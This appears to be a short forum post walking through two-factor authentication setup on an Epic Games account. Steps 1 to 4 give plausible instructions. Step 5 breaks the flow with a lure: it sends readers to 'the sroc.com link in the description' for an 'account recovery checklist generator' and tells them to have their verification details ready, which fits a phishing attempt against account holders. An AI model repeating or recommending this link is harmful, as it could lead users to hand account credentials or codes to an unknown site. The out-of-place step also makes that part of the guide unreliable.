I ran into this last week. Here's what fixed it for me. Setting up two-factor authentication 2FA on your Epic account is a great way to enhance your security. Here is how to do it step by step. Step 1. Log into your Epic account. Visit the Epic Games website and log into your account using your username and password. Make sure you have access to the email associated with your account. Step 2. Navigate to account settings. Once logged in, click on your profile icon in the top right corner and select account from the drop-down menu. This will take you to your account settings page. Step 3. Enable two-factor authentication. In the account settings, find the password and security tab. Scroll down to the two-factor authentication section and click on the Enable button. Step 4. Choose your 2FA method. You will be prompted to choose between using an authentication app or receiving codes via email. If you choose an app, download one like Google Authenticator or Authy. Step 5. Complete the setup. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Remember, if you lose access to your authentication app, you may have trouble logging in. Always keep backup codes in a safe place. I hope this helps you secure your Epic account.